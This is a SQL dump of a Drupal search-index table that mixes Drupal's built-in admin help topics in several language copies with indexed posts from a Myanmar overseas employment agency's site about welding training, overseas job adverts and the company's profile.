(11, 'ko', 'help_search', ' managing comments what is a comment  a comment is a piece of content typically posted by a website visitor which provides discussion or commentary on other content like blog posts and news articles comments are a type of content entity and can have fields that store text html markup and other data comments are attached to other content entities via comment fields see managing content structure for more about content entities and fields what is a comment type  comments are divided into comment types  which are the entity subtypes for the comment entity type each comment type has its own fields and its own form and display settings each type can be used to comment on a single entity type you can set up different comment types for different commenting purposes on your web site for example you might set up a comment type for recipes that has fields how did it taste and did the instructions work and another comment type for blog entries that has only a generic comment body field what is moderation  moderation is a workflow where comments posted by some users on your site are verified before being published to prevent spam and other bad behavior the core software provides basic moderation functionality you can configure permissions so that new comments posted by some user roles start as unpublished until a user with a different role reviews and publishes them contributed modules provide additional moderation and spamreduction functionality such as requiring untrusted users pass a captcha test before submitting comments and letting community members flag comments as possible spam see managing user accounts and site visitors for more about users permissions and roles overview of managing comments the core comment module provides the following functionality posting comments creating comment types the core field ui module allows you to attach fields to comment types and attach comment reference fields to other entities so that people can comment on them configuring commenting moderating comments as discussed above see the related topics listed below for specific tasks  ', 1787923659),
(11, 'ko', 'node_search', '  연락처   연락처 cometadmin mon 7032023 1749  뉴코멧 트레이 레이딩 에이전 이전시    a 32 동 2 층 201 호 미얀마 공리 주택 myanmagonyi housing 어퍼 파송단 송단길 민가라 가라떵 라떵뉸 떵뉸타 뉸타운 타운십 mingalartaungnyunt township 양곤 미얀마 전화번 화번호 1 8393300 1 8393344 1 8393393 9 775556677 바이버 959 5556677 이메일  newcometagency gmailcom  웹사이 사이트 wwwnewcomettradingagencycom  ', 0),
(12, 'en', 'help_search', ' exporting your complete site configuration goal create and download an archive containing all your site s configuration exported as yaml files see managing and deploying configuration for more information about configuration steps in the manage administrative menu navigate to configuration   development   configuration synchronization   export  click export and save the archive file  ', 1787923659),
(12, 'ja', 'help_search', ' exporting your complete site configuration goal create and download an archive containing all your site s configuration exported as yaml files see managing and deploying configuration for more information about configuration steps in the manage administrative menu navigate to configuration   development   configuration synchronization   export  click export and save the archive file  ', 1787923659),
(12, 'ko', 'help_search', ' exporting your complete site configuration goal create and download an archive containing all your site s configuration exported as yaml files see managing and deploying configuration for more information about configuration steps in the manage administrative menu navigate to configuration   development   configuration synchronization   export  click export and save the archive file  ', 1787923659),
(13, 'en', 'help_search', ' exporting a single configuration item goal export a single configuration item to a file see managing and deploying configuration for more information about configuration steps in the manage administrative menu navigate to configuration   development   configuration synchronization   export   single item  select the configuration type that you want to export and then select the specific configuration name to export use your browser to copy the text in the box marked here is your configuration to the clipboard paste the copied text into a plaintext editor on your computer or other device and save it using the suggested file name below the text box  ', 1787923659),
(13, 'ja', 'help_search', ' exporting a single configuration item goal export a single configuration item to a file see managing and deploying configuration for more information about configuration steps in the manage administrative menu navigate to configuration   development   configuration synchronization   export   single item  select the configuration type that you want to export and then select the specific configuration name to export use your browser to copy the text in the box marked here is your configuration to the clipboard paste the copied text into a plaintext editor on your computer or other device and save it using the suggested file name below the text box  ', 1787923659),
(13, 'ko', 'help_search', ' exporting a single configuration item goal export a single configuration item to a file see managing and deploying configuration for more information about configuration steps in the manage administrative menu navigate to configuration   development   configuration synchronization   export   single item  select the configuration type that you want to export and then select the specific configuration name to export use your browser to copy the text in the box marked here is your configuration to the clipboard paste the copied text into a plaintext editor on your computer or other device and save it using the suggested file name below the text box  ', 1787923659),
(14, 'en', 'help_search', ' importing your complete site configuration goal import the complete configuration of your site from an archive file such as one that was previously exported see exporting your complete site configuration see managing and deploying configuration for more information about configuration steps in the manage administrative menu navigate to configuration   development   configuration synchronization   import  browse to find the configuration archive that you want to import click upload  your configuration archive will be unpacked and placed in the configuration synchronization directory and you will be redirected to the synchronize page review the differences between your uploaded configuration and the active configuration if any and click import all to import the changes  ', 1787923659),
(14, 'ja', 'help_search', ' importing your complete site configuration goal import the complete configuration of your site from an archive file such as one that was previously exported see exporting your complete site configuration see managing and deploying configuration for more information about configuration steps in the manage administrative menu navigate to configuration   development   configuration synchronization   import  browse to find the configuration archive that you want to import click upload  your configuration archive will be unpacked and placed in the configuration synchronization directory and you will be redirected to the synchronize page review the differences between your uploaded configuration and the active configuration if any and click import all to import the changes  ', 1787923659),
(14, 'ko', 'help_search', ' importing your complete site configuration goal import the complete configuration of your site from an archive file such as one that was previously exported see exporting your complete site configuration see managing and deploying configuration for more information about configuration steps in the manage administrative menu navigate to configuration   development   configuration synchronization   import  browse to find the configuration archive that you want to import click upload  your configuration archive will be unpacked and placed in the configuration synchronization directory and you will be redirected to the synchronize page review the differences between your uploaded configuration and the active configuration if any and click import all to import the changes  ', 1787923659),
(15, 'en', 'help_search', ' importing a single configuration item goal import a single configuration item in yaml format such as one that was previously exported see exporting a single configuration item see managing and deploying configuration for more information about configuration steps in the manage administrative menu navigate to configuration   development   configuration synchronization   import   single item  select the configuration type that you want to import on your computer or other device copy the yamlformat configuration that you want to import to the clipboard paste the clipboard text into the box labeled paste your configuration here  click import   ', 1787923659),
(15, 'ja', 'help_search', ' importing a single configuration item goal import a single configuration item in yaml format such as one that was previously exported see exporting a single configuration item see managing and deploying configuration for more information about configuration steps in the manage administrative menu navigate to configuration   development   configuration synchronization   import   single item  select the configuration type that you want to import on your computer or other device copy the yamlformat configuration that you want to import to the clipboard paste the clipboard text into the box labeled paste your configuration here  click import   ', 1787923659),
(15, 'ko', 'help_search', ' importing a single configuration item goal import a single configuration item in yaml format such as one that was previously exported see exporting a single configuration item see managing and deploying configuration for more information about configuration steps in the manage administrative menu navigate to configuration   development   configuration synchronization   import   single item  select the configuration type that you want to import on your computer or other device copy the yamlformat configuration that you want to import to the clipboard paste the clipboard text into the box labeled paste your configuration here  click import   ', 1787923659),
(16, 'en', 'help_search', ' translating configuration goal translate your site configuration to another language see adding a language if you need to add a new language steps in the manage administrative menu navigate to configuration   region and language   configuration translation  find either the configuration entity type or the simple configuration item that you want to translate in the label column of the list click list under operations for a configuration entity or translate for simple configuration see managing and deploying configuration to learn more about types of configuration and configuration entities for configuration entities find the specific entity that you want to translate on the next page and click translate under operations  enter translations for the translatable text fields for the configuration item and save  ', 1787923659),
(16, 'ja', 'help_search', ' translating configuration goal translate your site configuration to another language see adding a language if you need to add a new language steps in the manage administrative menu navigate to configuration   region and language   configuration translation  find either the configuration entity type or the simple configuration item that you want to translate in the label column of the list click list under operations for a configuration entity or translate for simple configuration see managing and deploying configuration to learn more about types of configuration and configuration entities for configuration entities find the specific entity that you want to translate on the next page and click translate under operations  enter translations for the translatable text fields for the configuration item and save  ', 1787923659),
(16, 'ko', 'help_search', ' translating configuration goal translate your site configuration to another language see adding a language if you need to add a new language steps in the manage administrative menu navigate to configuration   region and language   configuration translation  find either the configuration entity type or the simple configuration item that you want to translate in the label column of the list click list under operations for a configuration entity or translate for simple configuration see managing and deploying configuration to learn more about types of configuration and configuration entities for configuration entities find the specific entity that you want to translate on the next page and click translate under operations  enter translations for the translatable text fields for the configuration item and save  ', 1787923659),
(17, 'en', 'help_search', ' managing the fields of contact forms goal add remove or rearrange the fields on personal and sitewide contact forms what are the fields on contact forms  both personal and sitewide contact forms will always have subject and message fields you can add additional fields for users to fill out if desired note that if you want to display other content on a form page such as text or images you can use a content block steps in the manage administrative menu navigate to structure   contact forms  click manage fields for the form you want to change the fields of and add or remove one or more fields on the form click manage form display to change the order or configuration of the fields on the form  ', 1787923659),
(17, 'en', 'node_search', ' the first batch of welding trainees from new comet trading agency co ltd from sinmalai shipyard was met by the deputy minister of the ministry of transport and communications and gave speeches and inspected the training school the first batch of welding trainees from new comet trading agency co ltd from sinmalai shipyard was met by the deputy minister of the ministry of transport and communications and gave speeches and inspected the training school admin sat 7012023 1327 sat 6032023 931 362023 the first batch of welding trainees from new comet trading agency co ltd from sinmalai shipyard was met by the deputy minister of the ministry of transport and communications and gave speeches and inspected the training school new comet trading agency co ltd 95556677 95015742 9775556677018393300018393344 the first batch of welding trainees from new comet trading agency co ltd from sinmalai shipyard was met by the deputy minister of the ministry of transport and communications and gave speeches and inspected the training school  ', 0),
(17, 'ja', 'help_search', ' managing the fields of contact forms goal add remove or rearrange the fields on personal and sitewide contact forms what are the fields on contact forms  both personal and sitewide contact forms will always have subject and message fields you can add additional fields for users to fill out if desired note that if you want to display other content on a form page such as text or images you can use a content block steps in the manage administrative menu navigate to structure   contact forms  click manage fields for the form you want to change the fields of and add or remove one or more fields on the form click manage form display to change the order or configuration of the fields on the form  ', 1787923659),
(17, 'ja', 'node_search', '  ニュー ューコ ーコメ コメッ メット ット商 ト商社 商社株 社株式 株式会 式会社 会社の 社のシ のシン シンマ ンマラ マライ ライク イク造 ク造船 造船所 船所か 所から からの らの初 の初め 初めて めての ての溶 の溶接 溶接研 接研修 研修生 修生た 生たち たちが 運輸通 輸通信 通信省 信省の 省の副 の副大 副大臣 大臣に 臣によ によっ よって って出 て出迎 出迎え 迎えら えられ スピー ピーチ ーチを チを行 を行い 訓練校 練校を 校を視 を視察 視察し 察しま しまし ました   ニュー ューコ ーコメ コメッ メット ット商 ト商社 商社株 社株式 株式会 式会社 会社の 社のシ のシン シンマ ンマラ マライ ライク イク造 ク造船 造船所 船所か 所から からの らの初 の初め 初めて めての ての溶 の溶接 溶接研 接研修 研修生 修生た 生たち たちが 運輸通 輸通信 通信省 信省の 省の副 の副大 副大臣 大臣に 臣によ によっ よって って出 て出迎 出迎え 迎えら えられ スピー ピーチ ーチを チを行 を行い 訓練校 練校を 校を視 を視察 視察し 察しま しまし ました cometadmin mon 7032023 1921 sat 6032023 931 ニュー ューコ ーコメ コメッ メット ット商 ト商社 商社株 社株式 株式会 式会社 会社の 社のシ のシン シンマ ンマラ マライ ライク イク造 ク造船 造船所 船所か 所から からの らの初 の初め 初めて めての ての溶 の溶接 溶接研 接研修 研修生 修生た 生たち たちが 運輸通 輸通信 通信省 信省の 省の副 の副大 副大臣 大臣に 臣によ によっ よって って出 て出迎 出迎え 迎えら えられ スピー ピーチ ーチを チを行 を行い 訓練校 練校を 校を視 を視察 視察し 察しま しまし ました ニュー コメッ メット トレー レーデ ーディ ディン ィング エージ ージェ ジェン ェンシ ンシー 株式会 式会社 95556677 95015742 9775556677018393300018393344 ニュー ューコ ーコメ コメッ メット ット商 ト商社 商社株 社株式 株式会 式会社 会社の 社のシ のシン シンマ ンマラ マライ ライク イク造 ク造船 造船所 船所か 所から からの らの初 の初め 初めて めての ての溶 の溶接 溶接研 接研修 研修生 修生た 生たち たちが 運輸通 輸通信 通信省 信省の 省の副 の副大 副大臣 大臣に 臣によ によっ よって って出 て出迎 出迎え 迎えら えられ スピー ピーチ ーチを チを行 を行い 訓練校 練校を 校を視 を視察 視察し 察しま しまし ました  ', 0),
(17, 'ko', 'help_search', ' managing the fields of contact forms goal add remove or rearrange the fields on personal and sitewide contact forms what are the fields on contact forms  both personal and sitewide contact forms will always have subject and message fields you can add additional fields for users to fill out if desired note that if you want to display other content on a form page such as text or images you can use a content block steps in the manage administrative menu navigate to structure   contact forms  click manage fields for the form you want to change the fields of and add or remove one or more fields on the form click manage form display to change the order or configuration of the fields on the form  ', 1787923659),
(17, 'ko', 'node_search', ' ဆင်မလိုက်သင်္ဘောကျင်းမှ new comet trading agency co ltd မှ ပထမအသုတ်ဂဟေဆော်သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့်ဆက်သွယ်ရေးဝန်ကြီး ဌာနမှ ဒုဝန်ကြီးမှလာရောက်တွေ့ဆုံ အမှာစကားများပြောကြားပေးပြီး သင်တန်းကျောင်းအားလာရောက်စစ်ဆေးစဉ် ဆင်မလိုက်သင်္ဘောကျင်းမှ new comet trading agency co ltd မှ ပထမအသုတ်ဂဟေဆော်သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့်ဆက်သွယ်ရေးဝန်ကြီး ဌာနမှ ဒုဝန်ကြီးမှလာရောက်တွေ့ဆုံ အမှာစကားများပြောကြားပေးပြီး သင်တန်းကျောင်းအားလာရောက်စစ်ဆေးစဉ် cometadmin mon 7032023 1921 sat 6032023 931 ၃၆၂၀၂၃ ဆင်မလိုက်သင်္ဘောကျင်းမှ new comet trading agency co ltd မှ ပထမအသုတ်ဂဟေဆော်သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့်ဆက်သွယ်ရေးဝန်ကြီး ဌာနမှ ဒုဝန်ကြီးမှလာရောက်တွေ့ဆုံ အမှာစကားများပြောကြားပေးပြီး သင်တန်းကျောင်းအားလာရောက်စစ်ဆေးစဉ် new comet trading agency co ltd 95556677 95015742 9775556677018393300018393344 ဆင်မလိုက်သင်္ဘောကျင်းမှ new comet trading agency co ltd မှ ပထမအသုတ်ဂဟေဆော်သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့်ဆက်သွယ်ရေးဝန်ကြီး ဌာနမှ ဒုဝန်ကြီးမှလာရောက်တွေ့ဆုံ အမှာစကားများပြောကြားပေးပြီး သင်တန်းကျောင်းအားလာရောက်စစ်ဆေးစဉ်  ', 0),
(18, 'en', 'help_search', ' configuring personal contact forms goal configure personal contact forms for registered users on the website steps in the manage administrative menu navigate to configuration   people   account settings  in the contact settings section check uncheck the box to enable disable the contact form for new user accounts click save configuration  in the manage administrative menu navigate to people   permissions  verify that permissions are correct for your site s roles including the generic anonymous user and authenticated user  in order to use personal contact forms users need both view user information  in the user section which enables them to view user profiles and use users personal contact forms  in the contact section which enables them to use contact forms if they can view user profiles click save permissions  the contact form will always have subject and message fields if you want to add more fields follow the steps in managing the fields of contact forms  ', 1787923659),
(18, 'en', 'node_search', ' food beverage hostess to work at 5 stars hotels in dubai or abu dhabi are wanted desperately food beverage hostess to work at 5 stars hotels in dubai or abu dhabi are wanted desperately admin sat 7012023 1347 fri 6232023 949 food beverage hostess to work at 5 stars hotels in dubai or abu dhabi are wanted desperately 1must be an experienced lady who have at least 2 years work experience in f b industry 2living expenses meals and transportation fees are provided 3must be under 30 healthy and have good communication skill 4must be graduated from university 5must speak english well contact us new comet trading agency co ltd 9775556677 9950947491 95015742 9971286882 9752510732 18393300018393344  ', 0),
(18, 'ja', 'help_search', ' configuring personal contact forms goal configure personal contact forms for registered users on the website steps in the manage administrative menu navigate to configuration   people   account settings  in the contact settings section check uncheck the box to enable disable the contact form for new user accounts click save configuration  in the manage administrative menu navigate to people   permissions  verify that permissions are correct for your site s roles including the generic anonymous user and authenticated user  in order to use personal contact forms users need both view user information  in the user section which enables them to view user profiles and use users personal contact forms  in the contact section which enables them to use contact forms if they can view user profiles click save permissions  the contact form will always have subject and message fields if you want to add more fields follow the steps in managing the fields of contact forms  ', 1787923659),
(18, 'ja', 'node_search', '  ドバイ バイま イまた または たはア はアブ アブダ ブダビ ダビの 5 つ星ホ 星ホテ ホテル テルで ルで働 で働く 働くフ くフー フード ビバレ バレッ レッジ ッジホ ジホス ホステ ステス テスを スを緊 を緊急 緊急で 急で求 で求め 求めて めてい ていま います   ドバイ バイま イまた または たはア はアブ アブダ ブダビ ダビの 5 つ星ホ 星ホテ ホテル テルで ルで働 で働く 働くフ くフー フード ビバレ バレッ レッジ ッジホ ジホス ホステ ステス テスを スを緊 を緊急 緊急で 急で求 で求め 求めて めてい ていま います cometadmin mon 7032023 1925 fri 6232023 949 ドバイ バイま イまた または たはア はアブ アブダ ブダビ ダビの 5 つ星ホ 星ホテ ホテル テルで ルで働 で働く 働くフ くフー フード ビバレ バレッ レッジ ッジホ ジホス ホステ ステス テスを スを緊 を緊急 緊急で 急で求 で求め 求めて めてい ていま います 1 飲食業 食業界 業界で 界で少 で少な 少なく なくと くとも 2 年の勤 の勤務 勤務経 務経験 経験が 験があ がある ある経 る経験 経験豊 験豊富 豊富な 富な女 な女性 女性で 性であ である ある必 る必要 必要が 要があ があり ありま ります 2 生活費 食費 交通費 通費を 費を支 を支給 支給し 給しま します 330 歳以下 以下で 下で健 で健康 健康で 康でコ でコミ コミュ ミュニ ュニケ ニケー ケーシ ーショ ション ョン能 ン能力 能力の 力のあ のある ある方 4 大学を 学を卒 を卒業 卒業し 業して してい ている いる必 る必要 必要が 要があ があり ありま ります 5 英語を 語を上 を上手 上手に 手に話 に話さ 話さな さなけ なけれ ければ ればな ばなり なりま りませ ません  contact us new comet trading agency co ltd 9775556677 9950947491 95015742 9971286882 9752510732 18393300018393344  ', 0),
(18, 'ko', 'help_search', ' configuring personal contact forms goal configure personal contact forms for registered users on the website steps in the manage administrative menu navigate to configuration   people   account settings  in the contact settings section check uncheck the box to enable disable the contact form for new user accounts click save configuration  in the manage administrative menu navigate to people   permissions  verify that permissions are correct for your site s roles including the generic anonymous user and authenticated user  in order to use personal contact forms users need both view user information  in the user section which enables them to view user profiles and use users personal contact forms  in the contact section which enables them to use contact forms if they can view user profiles click save permissions  the contact form will always have subject and message fields if you want to add more fields follow the steps in managing the fields of contact forms  ', 1787923659),
(18, 'ko', 'node_search', ' food beverage hostess to work at 5 stars hotels in dubai or abu dhabi are wanted desperately food beverage hostess to work at 5 stars hotels in dubai or abu dhabi are wanted desperately cometadmin mon 7032023 1925 fri 6232023 949 food beverage hostess to work at 5 stars hotels in dubai or abu dhabi are wanted desperately 1must be an experienced lady who have at least 2 years work experience in f b industry 2living expenses meals and transportation fees are provided 3must be under 30 healthy and have good communication skill 4must be graduated from university 5must speak english well contact us new comet trading agency co ltd 9775556677 9950947491 95015742 9971286882 9752510732 18393300018393344  ', 0),
(19, 'en', 'help_search', ' creating a new contact form goal create a new sitewide contact form steps in the manage administrative menu navigate to structure   contact forms  click add contact form  fill in the label  title for the form  recipients  and optionally the other settings click save  you should see your new contact form in the table along with a link to view it the contact form will always have subject and message fields if you want to add more fields follow the steps in managing the fields of contact forms  ', 1787923659),
(19, 'en', 'node_search', ' over 60 people from 1st batch came to register for koshipa skill test to go to korea with welding technician position e 73 visa over 60 people from 1st batch came to register for koshipa skill test to go to korea with welding technician position e 73 visa admin sat 7012023 1507 wed 6142023 909 over 60 people from 1st batch came to register for koshipa skill test to go to korea with welding technician position e 73 visa new comet trading agency co ltd 9775556677 9950947491 95015742 18393300018393344  ', 0),
(19, 'ja', 'help_search', ' creating a new contact form goal create a new sitewide contact form steps in the manage administrative menu navigate to structure   contact forms  click add contact form  fill in the label  title for the form  recipients  and optionally the other settings click save  you should see your new contact form in the table along with a link to view it the contact form will always have subject and message fields if you want to add more fields follow the steps in managing the fields of contact forms  ', 1787923659),
(19, 'ja', 'node_search', '  第 1 バッチ ッチか チから 60 人以上 以上の 上の方 の方が 溶接技 接技術 技術者 術者の e 73 ビザポ ザポジ ポジシ ジショ ション ョンで ンで韓 で韓国 韓国に 国に行 に行く 行くた くため ための koshipa スキル キルテ ルテス テスト ストの トの受 の受験 受験登 験登録 登録に 録に来 に来ら 来られ られま れまし ました   第 1 バッチ ッチか チから 60 人以上 以上の 上の方 の方が 溶接技 接技術 技術者 術者の e 73 ビザポ ザポジ ポジシ ジショ ション ョンで ンで韓 で韓国 韓国に 国に行 に行く 行くた くため ための koshipa スキル キルテ ルテス テスト ストの トの受 の受験 受験登 験登録 登録に 録に来 に来ら 来られ られま れまし ました cometadmin mon 7032023 1922 wed 6142023 909 第 1 バッチ ッチか チから 60 人以上 以上の 上の方 の方が 溶接技 接技術 技術者 術者の e 73 ビザポ ザポジ ポジシ ジショ ション ョンで ンで韓 で韓国 韓国に 国に行 に行く 行くた くため ための koshipa スキル キルテ ルテス テスト ストの トの受 の受験 受験登 験登録 登録に 録にや にやっ やって ってき てきま きまし ました ニュー コメッ メット トレー レーデ ーディ ディン ィング エージ ージェ ジェン ェンシ ンシー 株式会 式会社 9775556677 9950947491 95015742 18393300018393344  ', 0),
(19, 'ko', 'help_search', ' creating a new contact form goal create a new sitewide contact form steps in the manage administrative menu navigate to structure   contact forms  click add contact form  fill in the label  title for the form  recipients  and optionally the other settings click save  you should see your new contact form in the table along with a link to view it the contact form will always have subject and message fields if you want to add more fields follow the steps in managing the fields of contact forms  ', 1787923659),
(19, 'ko', 'node_search', ' over 60 people from 1st batch came to register for koshipa skill test to go to korea with welding technician position e 73 visa over 60 people from 1st batch came to register for koshipa skill test to go to korea with welding technician position e 73 visa cometadmin mon 7032023 1923 wed 6142023 909 over 60 people from 1st batch came to register for koshipa skill test to go to korea with welding technician position e 73 visa new comet trading agency co ltd 9775556677 9950947491 95015742 18393300018393344  ', 0),
(20, 'en', 'help_search', ' managing contact forms what are contact forms  there are two different types of contact forms provided by the core contact module personal contact forms which allow users to contact other users on the site and sitewide contact forms which allow users to contact site managers or administrators a site can have more than one sitewide contact form each has its own fields to fill out recipients and url you can also change the fields that are shown on personal contact forms using the personal contact form site visitors can email registered users on your site by using the personal contact form without knowing or learning the email address of the recipient when a user with the correct permissions is viewing another user s profile the viewer will see a contact tab or link which leads to the personal contact form if the user whose profile is being viewed has their personal contact form enabled this is a user account setting  contact form management tasks see the related topics below for specific tasks  ', 1787923659),
(20, 'en', 'node_search', ' memorial photo of 2nd batch welding students memorial photo of 2nd batch welding students admin sat 7012023 1609 mon 6192023 909 memorial photo of 2nd batch welding students 1962023  ', 0),
(20, 'ja', 'help_search', ' managing contact forms what are contact forms  there are two different types of contact forms provided by the core contact module personal contact forms which allow users to contact other users on the site and sitewide contact forms which allow users to contact site managers or administrators a site can have more than one sitewide contact form each has its own fields to fill out recipients and url you can also change the fields that are shown on personal contact forms using the personal contact form site visitors can email registered users on your site by using the personal contact form without knowing or learning the email address of the recipient when a user with the correct permissions is viewing another user s profile the viewer will see a contact tab or link which leads to the personal contact form if the user whose profile is being viewed has their personal contact form enabled this is a user account setting  contact form management tasks see the related topics below for specific tasks  ', 1787923659),
(20, 'ja', 'node_search', '  第 2 回生 研修生 修生達 生達と 達と記 と記念   第 2 回生 研修生 修生達 生達と 達と記 と記念 cometadmin mon 7032023 1922 mon 6192023 909  第  2  回生 研修生 修生達 生達と 達と記 と記念      2023  年  6  月  20  日    ', 0),
(20, 'ko', 'help_search', ' managing contact forms what are contact forms  there are two different types of contact forms provided by the core contact module personal contact forms which allow users to contact other users on the site and sitewide contact forms which allow users to contact site managers or administrators a site can have more than one sitewide contact form each has its own fields to fill out recipients and url you can also change the fields that are shown on personal contact forms using the personal contact form site visitors can email registered users on your site by using the personal contact form without knowing or learning the email address of the recipient when a user with the correct permissions is viewing another user s profile the viewer will see a contact tab or link which leads to the personal contact form if the user whose profile is being viewed has their personal contact form enabled this is a user account setting  contact form management tasks see the related topics below for specific tasks  ', 1787923659),
(20, 'ko', 'node_search', ' memorial photo of 2nd batch welding students memorial photo of 2nd batch welding students cometadmin mon 7032023 1922 mon 6192023 909 memorial photo of 2nd batch welding students 1962023  ', 0),
(21, 'en', 'help_search', ' setting a default contact form goal set a sitewide contact form to be the default contact form  the form displayed on the default contact page  for example   contact   steps in the manage administrative menu navigate to structure   contact forms  click edit for the sitewide form you want to be the default check make this the default form and click save   ', 1787923659),
(21, 'en', 'node_search', ' slider1 slider1 cometadmin mon 7032023 1757  ', 0),
(21, 'ja', 'help_search', ' setting a default contact form goal set a sitewide contact form to be the default contact form  the form displayed on the default contact page  for example   contact   steps in the manage administrative menu navigate to structure   contact forms  click edit for the sitewide form you want to be the default check make this the default form and click save   ', 1787923659),
(21, 'ko', 'help_search', ' setting a default contact form goal set a sitewide contact form to be the default contact form  the form displayed on the default contact page  for example   contact   steps in the manage administrative menu navigate to structure   contact forms  click edit for the sitewide form you want to be the default check make this the default form and click save   ', 1787923659);
INSERT INTO `search_dataset` (`sid`, `langcode`, `type`, `data`, `reindex`) VALUES
(22, 'en', 'help_search', ' using contextual links goal use contextual links to access administrative tasks without navigating the administrative menu what are contextual links  contextual links give users with the use contextual links permission quick access to administrative tasks related to areas of nonadministrative pages for example if a page on your site displays a block the block would have a contextual link that would allow users with permission to configure the block if the block contains a menu or a view it would also have a contextual link for editing the menu links or the view clicking a contextual link takes you to the related administrative page directly without needing to navigate through the administrative menu system steps make sure that the core contextual links module is installed and that you have a role with the use contextual links permission optionally make sure that a toolbar module is installed either the core toolbar module or a contributed module replacement visit a nonadministrative page on your site such as the home page locate a block or another area on the page that you want to edit or configure make the contextual links button visible by hovering your mouse over that area in the page in most themes this button looks like a pencil and is placed in the upper right corner of the page area upper left for righttoleft languages and hovering will also temporarily outline the affected area alternatively click the contextual links toggle button on the right end of the toolbar left end for righttoleft languages which will make all contextual link buttons on the page visible until it is clicked again while the contextual links button for the area of interest is visible click the button to display the list of links for that area click a link in the list to visit the corresponding administrative page complete your administrative task and save your settings or cancel the action you should be returned to the page you started from  ', 1787923659),
(22, 'en', 'node_search', ' slider2 slider2 cometadmin mon 7032023 1757  ', 0),
(22, 'ja', 'help_search', ' using contextual links goal use contextual links to access administrative tasks without navigating the administrative menu what are contextual links  contextual links give users with the use contextual links permission quick access to administrative tasks related to areas of nonadministrative pages for example if a page on your site displays a block the block would have a contextual link that would allow users with permission to configure the block if the block contains a menu or a view it would also have a contextual link for editing the menu links or the view clicking a contextual link takes you to the related administrative page directly without needing to navigate through the administrative menu system steps make sure that the core contextual links module is installed and that you have a role with the use contextual links permission optionally make sure that a toolbar module is installed either the core toolbar module or a contributed module replacement visit a nonadministrative page on your site such as the home page locate a block or another area on the page that you want to edit or configure make the contextual links button visible by hovering your mouse over that area in the page in most themes this button looks like a pencil and is placed in the upper right corner of the page area upper left for righttoleft languages and hovering will also temporarily outline the affected area alternatively click the contextual links toggle button on the right end of the toolbar left end for righttoleft languages which will make all contextual link buttons on the page visible until it is clicked again while the contextual links button for the area of interest is visible click the button to display the list of links for that area click a link in the list to visit the corresponding administrative page complete your administrative task and save your settings or cancel the action you should be returned to the page you started from  ', 1787923659),
(22, 'ko', 'help_search', ' using contextual links goal use contextual links to access administrative tasks without navigating the administrative menu what are contextual links  contextual links give users with the use contextual links permission quick access to administrative tasks related to areas of nonadministrative pages for example if a page on your site displays a block the block would have a contextual link that would allow users with permission to configure the block if the block contains a menu or a view it would also have a contextual link for editing the menu links or the view clicking a contextual link takes you to the related administrative page directly without needing to navigate through the administrative menu system steps make sure that the core contextual links module is installed and that you have a role with the use contextual links permission optionally make sure that a toolbar module is installed either the core toolbar module or a contributed module replacement visit a nonadministrative page on your site such as the home page locate a block or another area on the page that you want to edit or configure make the contextual links button visible by hovering your mouse over that area in the page in most themes this button looks like a pencil and is placed in the upper right corner of the page area upper left for righttoleft languages and hovering will also temporarily outline the affected area alternatively click the contextual links toggle button on the right end of the toolbar left end for righttoleft languages which will make all contextual link buttons on the page visible until it is clicked again while the contextual links button for the area of interest is visible click the button to display the list of links for that area click a link in the list to visit the corresponding administrative page complete your administrative task and save your settings or cancel the action you should be returned to the page you started from  ', 1787923659),
(23, 'en', 'help_search', ' connecting text editors to text formats goal configure a text format so that when a user is editing text and selects this text format a text editor installed on your site is shown configure the text editor such as choosing which buttons and functions are available see managing text filters and text formats for more about text formats what is a text editor  a text editor is software typically a javascript library that provides buttons and other command mechanisms to make editing html text easier some editors are called visual or wysiwyg what you see is what you get  editors these editors hide the details of html from the user and instead show formatted output on the screen the core text editor module provides a framework for deploying text editors on your site the core ckeditor 5 module provides ckeditor 5 which is a widelyused javascript text editor that creates clean and valid html the module also enforces the html tag restrictions in the associated text format various contributed modules provide other editors to install a new editor besides installing the module you may need to download the editor library from a thirdparty site steps in the manage administrative menu navigate to configuration   content authoring   text formats and editors  the text editor column in the table shows the text editor that is currently connected to each text format if any follow the steps on managing text filters and text formats to add a new text format or configure an existing text format when you reach the step about text editors return to this topic select ckeditor 5 as the text editor  or another text editor that you have installed the rest of these steps assume you selected ckeditor 5  under toolbar configuration  drag buttons between available buttons and active toolbar  only buttons in active toolbar will be shown to the user focusing or hovering over a button will display a tooltip explaining what the button does drag buttons within active toolbar to the desired order and group buttons by dragging them between group identifiers drag a new group identifier to the toolbar to add additional groups if you add buttons that require configuration the ckeditor 5 plugin settings section will be visible and provide their respective configuration forms return to managing text filters and text formats to complete the text format configuration and be sure to save the text format  ', 1787923659),
(23, 'en', 'node_search', ' company profile company profile cometadmin mon 7032023 1805 we new comet trading company was established in 2004 and started operating with company registration number 29520042005 new comet trading agency co ltd new comet overseas employment agency license was obtained in 2023 and since then the company has started to carry out service activities new comet trading is part of the new comet trading group moreover the largest entity within it zeya new comet auto sale services co ltd have applied for vehicle import permits from the ministry of economy and commerce and have been working for more than 25 years in the business of buying importing and selling various types of business trucks tourism and transportation buses and machinery directly from japan we have been diligent in paying our taxes and have grown to employ 100 employees in addition brother companies such as new comet construction co ltd new zayya shwe pyi construction co ltd aung nay wun construction co ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees our company new comet trading agency company is currently providing welding training courses to become qualified skilled workers at the sinmalike shipyard for ethnic brothers from all over myanmar who want to work in korea s shipyards and connect them with job opportunities in addition we are connecting job opportunities for young people who want to work in countries such as dubai malaysia singapore thailand japan korea and etc we at new comet trading agency co ltd are responsible for assisting tobeemployees from the young generation of myanmar in learning about japan s developed advanced technologies and cultures while making sure they are able to express their personal abilities and traits in order to for our tobeemployees to pass the qualification tests jlpt jft nattest topj required to go to japan with a work visa and training visa we are opening language training schools and providing teaching support we new comet trading agency company is constantly striving to provide services that produce talented skilled workers from myanmar and send them to foreign countries  ', 0),
